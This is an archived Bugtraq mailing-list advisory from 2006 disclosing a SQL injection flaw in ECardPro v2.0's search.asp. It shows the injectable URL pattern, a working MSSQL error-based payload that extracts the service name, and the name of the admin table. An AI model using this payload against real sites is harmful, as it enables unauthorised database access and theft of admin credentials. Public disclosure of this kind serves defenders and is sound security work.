ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
From: ajannhwt@xxxxxxxxxxx
Date: 17 Sep 2006 13:29:20 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Vulnerability Report
*******************************************************************************
# Title  :  ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

*******************************************************************************

Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL 
Service Name

Admin Table: "admin"
etc(systemtables,union,update,select)......


# ajann,Turkey
# ...
# Im not Hacker!

Prev by Date: HP-UX X.25 Denial of Service Vulnerability
Next by Date: [SECURITY] [DSA 1178-1] New freetype packages fix execution of arbitrary code
Previous by thread: HP-UX X.25 Denial of Service Vulnerability
Next by thread: [SECURITY] [DSA 1178-1] New freetype packages fix execution of arbitrary code
Index(es):
- Date
- Thread